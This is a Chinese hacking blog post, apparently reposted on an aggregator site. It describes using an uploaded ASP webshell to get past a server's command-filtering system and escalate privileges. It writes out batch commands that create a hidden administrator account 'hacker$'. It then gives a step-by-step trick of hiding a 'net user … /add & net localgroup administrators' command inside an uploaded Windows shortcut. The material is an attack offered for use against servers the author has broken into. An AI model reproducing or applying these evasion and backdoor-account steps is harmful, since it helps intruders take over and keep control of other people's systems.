主要写的是突破提权的方法,
再次突破变态限制
。至于如何上传SHELL呢,我博客前面写过。有突破一流信息拦截系统的网站,上传个马就不容易,好容易上传了,还不能执行命令,郁闷了..
执行命令提权的时候因为命令里有 net user 被拦截,
我KAO,换个思路。
运行批命令和直接执行命令效果是一样的,它既然不让执行net命令,我运行批命令还不行吗?
立刻动手,在asp马里点[新建文件] 把名字改称hacker.bat 在内容里写上:
net usernet user hacker$ /del
net usernet user hacker$ hacker /add
net localgroup administrators hacker$ /add
OK。保存!
晕!不成功!直接被拦....
郁闷了一会,又想个办法:在本地弄个批命令,然后上传,这拦截系统总不会对文件拦截吧?
OK。上传!
晕!又被拦!...
难道这家伙真到看文件内容?
那它是怎么看的?
给服务器按个OD之类的?
不大现实...真正的EXE 程序想执行命令必然不会把命令原样保持在程序里的,
自己写个程序试试?
晕!没工具...又没经验...
算了
回家看电子书...1998-2002的绿盟的文章,好多..
看到个2000系统输入法漏洞入侵的文章,在文章结尾作者提出了几个问题,后来有高手做了答,
电脑资料
《再次突破变态限制》(https://www.unjs.com)。看到这几个问题的答案,偶突然有了突破一流信息拦截系统执行命令的方法..
.
1、准备提权命令:cmd.exe /c net user hacker hacker /add & net localgroup administrators hacker /add
2、新建快捷方式,在地址栏写入提权命令
3、上传这个快捷方式
4、在提权工具帮助下运行这个快捷方式.....
5、管理员添加成功....